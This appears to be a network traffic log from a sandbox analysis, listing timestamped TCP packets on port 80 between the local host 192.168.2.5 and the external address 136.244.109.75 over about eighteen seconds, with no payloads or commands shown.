Apr 17, 2024 03:18:31.391454935 CEST	80	49779	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:31.391707897 CEST	49779	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:31.393354893 CEST	49779	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:31.596699953 CEST	80	49779	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:31.596919060 CEST	49779	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:31.800268888 CEST	80	49779	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:32.588561058 CEST	80	49779	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:32.588629007 CEST	80	49779	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:32.588668108 CEST	80	49779	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:32.588706970 CEST	80	49779	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:32.588748932 CEST	80	49779	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:32.588788033 CEST	80	49779	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:32.588828087 CEST	80	49779	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:32.588834047 CEST	49779	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:32.588834047 CEST	49779	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:32.588834047 CEST	49779	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:32.588834047 CEST	49779	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:32.588834047 CEST	49779	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:32.588869095 CEST	80	49779	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:32.588907957 CEST	80	49779	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:32.588917017 CEST	49779	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:32.588917971 CEST	49779	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:32.588951111 CEST	80	49779	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:32.588970900 CEST	49779	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:32.588994980 CEST	49779	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:32.717094898 CEST	49780	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:32.792494059 CEST	80	49779	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:32.792525053 CEST	80	49779	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:32.792689085 CEST	49779	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:32.792690039 CEST	49779	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:32.920749903 CEST	80	49780	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:32.920958042 CEST	49780	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:32.922641039 CEST	49780	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:33.125963926 CEST	80	49780	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:33.126036882 CEST	49780	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:33.329478979 CEST	80	49780	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:34.054111004 CEST	80	49780	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:34.054174900 CEST	80	49780	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:34.054213047 CEST	80	49780	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:34.054250956 CEST	80	49780	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:34.054292917 CEST	80	49780	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:34.054331064 CEST	80	49780	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:34.054337025 CEST	49780	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:34.054337025 CEST	49780	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:34.054337025 CEST	49780	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:34.054369926 CEST	80	49780	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:34.054378033 CEST	49780	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:34.054378033 CEST	49780	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:34.054414988 CEST	80	49780	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:34.054454088 CEST	80	49780	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:34.054457903 CEST	49780	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:34.054457903 CEST	49780	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:34.054500103 CEST	80	49780	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:34.054541111 CEST	49780	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:34.054541111 CEST	49780	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:34.190171957 CEST	49781	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:34.258018970 CEST	80	49780	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:34.258085012 CEST	80	49780	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:34.258111000 CEST	49780	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:34.258172035 CEST	49780	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:34.393624067 CEST	80	49781	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:34.393888950 CEST	49781	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:34.395591974 CEST	49781	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:34.598676920 CEST	80	49781	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:34.598916054 CEST	49781	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:34.802150011 CEST	80	49781	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:35.517859936 CEST	80	49781	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:35.517924070 CEST	80	49781	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:35.517962933 CEST	80	49781	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:35.518002033 CEST	80	49781	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:35.518043995 CEST	80	49781	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:35.518081903 CEST	80	49781	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:35.518120050 CEST	80	49781	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:35.518157959 CEST	80	49781	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:35.518194914 CEST	80	49781	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:35.518238068 CEST	80	49781	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:35.518244982 CEST	49781	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:35.518245935 CEST	49781	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:35.518245935 CEST	49781	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:35.518245935 CEST	49781	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:35.518245935 CEST	49781	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:35.518346071 CEST	49781	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:35.655658007 CEST	49782	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:35.721888065 CEST	80	49781	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:35.721951962 CEST	80	49781	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:35.722227097 CEST	49781	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:35.722228050 CEST	49781	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:35.859636068 CEST	80	49782	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:35.859854937 CEST	49782	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:35.861537933 CEST	49782	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:36.065087080 CEST	80	49782	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:36.065365076 CEST	49782	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:36.268964052 CEST	80	49782	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:37.025995970 CEST	80	49782	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:37.026061058 CEST	80	49782	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:37.026099920 CEST	80	49782	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:37.026138067 CEST	80	49782	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:37.026180983 CEST	80	49782	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:37.026217937 CEST	80	49782	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:37.026257992 CEST	80	49782	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:37.026294947 CEST	80	49782	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:37.026333094 CEST	80	49782	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:37.026376963 CEST	80	49782	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:37.026356936 CEST	49782	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:37.026357889 CEST	49782	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:37.026357889 CEST	49782	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:37.026357889 CEST	49782	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:37.026357889 CEST	49782	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:37.026357889 CEST	49782	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:37.026357889 CEST	49782	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:37.026464939 CEST	49782	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:37.026464939 CEST	49782	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:37.156192064 CEST	49783	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:37.230096102 CEST	80	49782	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:37.230161905 CEST	80	49782	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:37.230237007 CEST	49782	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:37.232146025 CEST	49782	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:37.363995075 CEST	80	49783	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:37.364082098 CEST	49783	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:37.366004944 CEST	49783	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:37.573666096 CEST	80	49783	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:37.573782921 CEST	49783	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:37.781358957 CEST	80	49783	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:38.553556919 CEST	80	49783	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:38.553602934 CEST	80	49783	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:38.553639889 CEST	80	49783	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:38.553678036 CEST	80	49783	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:38.553711891 CEST	49783	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:38.553721905 CEST	80	49783	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:38.553761005 CEST	80	49783	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:38.553764105 CEST	49783	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:38.553797960 CEST	80	49783	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:38.553814888 CEST	49783	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:38.553836107 CEST	80	49783	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:38.553874016 CEST	80	49783	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:38.553891897 CEST	49783	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:38.553911924 CEST	80	49783	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:38.553924084 CEST	49783	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:38.553961039 CEST	49783	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:38.693017006 CEST	49784	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:38.761693954 CEST	80	49783	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:38.761764050 CEST	80	49783	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:38.761893988 CEST	49783	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:38.761893988 CEST	49783	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:38.896401882 CEST	80	49784	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:38.896647930 CEST	49784	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:38.899573088 CEST	49784	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:39.102683067 CEST	80	49784	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:39.102776051 CEST	49784	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:39.305864096 CEST	80	49784	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:40.071350098 CEST	80	49784	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:40.071413040 CEST	80	49784	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:40.071449995 CEST	80	49784	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:40.071485043 CEST	80	49784	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:40.071527004 CEST	80	49784	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:40.071567059 CEST	80	49784	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:40.071573973 CEST	49784	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:40.071573973 CEST	49784	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:40.071607113 CEST	80	49784	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:40.071618080 CEST	49784	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:40.071618080 CEST	49784	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:40.071649075 CEST	80	49784	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:40.071686029 CEST	80	49784	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:40.071700096 CEST	49784	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:40.071700096 CEST	49784	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:40.071727991 CEST	80	49784	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:40.071783066 CEST	49784	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:40.071783066 CEST	49784	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:40.217751980 CEST	49785	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:40.275021076 CEST	80	49784	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:40.275087118 CEST	80	49784	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:40.275147915 CEST	49784	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:40.275147915 CEST	49784	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:40.421391010 CEST	80	49785	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:40.421538115 CEST	49785	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:40.424546003 CEST	49785	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:40.628168106 CEST	80	49785	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:40.628382921 CEST	49785	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:40.831743002 CEST	80	49785	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:41.577303886 CEST	80	49785	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:41.577363968 CEST	80	49785	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:41.577400923 CEST	80	49785	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:41.577439070 CEST	80	49785	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:41.577482939 CEST	80	49785	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:41.577528000 CEST	80	49785	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:41.577570915 CEST	80	49785	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:41.577584982 CEST	49785	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:41.577585936 CEST	49785	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:41.577585936 CEST	49785	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:41.577585936 CEST	49785	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:41.577585936 CEST	49785	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:41.577615023 CEST	80	49785	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:41.577653885 CEST	80	49785	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:41.577667952 CEST	49785	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:41.577667952 CEST	49785	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:41.577692032 CEST	80	49785	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:41.577722073 CEST	49785	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:41.577748060 CEST	49785	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:41.718467951 CEST	49786	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:41.781233072 CEST	80	49785	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:41.781352043 CEST	80	49785	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:41.781447887 CEST	49785	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:41.781447887 CEST	49785	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:41.921859026 CEST	80	49786	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:41.922054052 CEST	49786	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:41.923839092 CEST	49786	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:42.127176046 CEST	80	49786	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:42.127413034 CEST	49786	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:42.330899954 CEST	80	49786	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:43.027508974 CEST	80	49786	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:43.027591944 CEST	80	49786	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:43.027694941 CEST	80	49786	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:43.027735949 CEST	80	49786	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:43.027781010 CEST	80	49786	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:43.027812958 CEST	49786	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:43.027812958 CEST	49786	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:43.027822971 CEST	80	49786	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:43.027834892 CEST	49786	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:43.027859926 CEST	80	49786	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:43.027896881 CEST	80	49786	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:43.027937889 CEST	80	49786	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:43.027981997 CEST	80	49786	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:43.028049946 CEST	49786	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:43.028049946 CEST	49786	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:43.028049946 CEST	49786	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:43.028049946 CEST	49786	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:43.028049946 CEST	49786	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:43.174395084 CEST	49787	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:43.231959105 CEST	80	49786	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:43.232075930 CEST	80	49786	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:43.232137918 CEST	49786	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:43.232139111 CEST	49786	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:43.383075953 CEST	80	49787	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:43.383378983 CEST	49787	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:43.385034084 CEST	49787	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:43.593281984 CEST	80	49787	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:43.593564987 CEST	49787	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:43.801616907 CEST	80	49787	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:44.557317972 CEST	80	49787	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:44.557375908 CEST	80	49787	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:44.557411909 CEST	80	49787	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:44.557440042 CEST	49787	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:44.557447910 CEST	80	49787	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:44.557481050 CEST	49787	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:44.557486057 CEST	80	49787	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:44.557493925 CEST	49787	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:44.557531118 CEST	49787	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:44.557532072 CEST	80	49787	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:44.557576895 CEST	80	49787	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:44.557615042 CEST	80	49787	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:44.557652950 CEST	80	49787	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:44.557689905 CEST	80	49787	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:44.557697058 CEST	49787	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:44.557697058 CEST	49787	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:44.557697058 CEST	49787	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:44.557697058 CEST	49787	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:44.557730913 CEST	49787	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:44.689703941 CEST	49788	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:44.765671015 CEST	80	49787	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:44.765786886 CEST	80	49787	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:44.765949965 CEST	49787	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:44.765949965 CEST	49787	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:44.897887945 CEST	80	49788	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:44.898154020 CEST	49788	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:44.899677992 CEST	49788	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:45.107578039 CEST	80	49788	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:45.109710932 CEST	49788	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:45.317635059 CEST	80	49788	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:46.054307938 CEST	80	49788	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:46.054367065 CEST	80	49788	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:46.054404974 CEST	80	49788	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:46.054442883 CEST	80	49788	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:46.054477930 CEST	49788	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:46.054477930 CEST	49788	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:46.054491997 CEST	80	49788	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:46.054536104 CEST	80	49788	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:46.054554939 CEST	49788	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:46.054554939 CEST	49788	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:46.054575920 CEST	80	49788	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:46.054579020 CEST	49788	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:46.054615021 CEST	80	49788	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:46.054619074 CEST	49788	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:46.054656029 CEST	80	49788	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:46.054671049 CEST	49788	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:46.054694891 CEST	80	49788	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:46.054702997 CEST	49788	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:46.054740906 CEST	49788	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:46.185456038 CEST	49789	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:46.262334108 CEST	80	49788	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:46.262398005 CEST	80	49788	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:46.262440920 CEST	49788	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:46.262521029 CEST	49788	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:46.389018059 CEST	80	49789	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:46.389152050 CEST	49789	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:46.390927076 CEST	49789	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:46.594014883 CEST	80	49789	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:46.594094038 CEST	49789	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:46.797466040 CEST	80	49789	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:47.542049885 CEST	80	49789	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:47.542165041 CEST	80	49789	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:47.542186975 CEST	80	49789	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:47.542207003 CEST	80	49789	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:47.542248011 CEST	80	49789	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:47.542285919 CEST	80	49789	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:47.542324066 CEST	80	49789	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:47.542360067 CEST	80	49789	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:47.542396069 CEST	80	49789	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:47.542392969 CEST	49789	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:47.542392969 CEST	49789	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:47.542439938 CEST	80	49789	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:47.542474031 CEST	49789	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:47.542474031 CEST	49789	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:47.542503119 CEST	49789	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:47.672533035 CEST	49790	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:47.745738983 CEST	80	49789	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:47.745803118 CEST	80	49789	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:47.745824099 CEST	49789	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:47.745920897 CEST	49789	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:47.880296946 CEST	80	49790	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:47.880389929 CEST	49790	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:47.882152081 CEST	49790	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:48.089668036 CEST	80	49790	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:48.089839935 CEST	49790	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:48.297440052 CEST	80	49790	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:49.029202938 CEST	80	49790	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:49.029257059 CEST	80	49790	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:49.029294968 CEST	80	49790	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:49.029330969 CEST	49790	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:49.029333115 CEST	80	49790	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:49.029361010 CEST	49790	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:49.029373884 CEST	80	49790	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:49.029381990 CEST	49790	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:49.029412031 CEST	80	49790	136.244.109.75	192.168.2.5
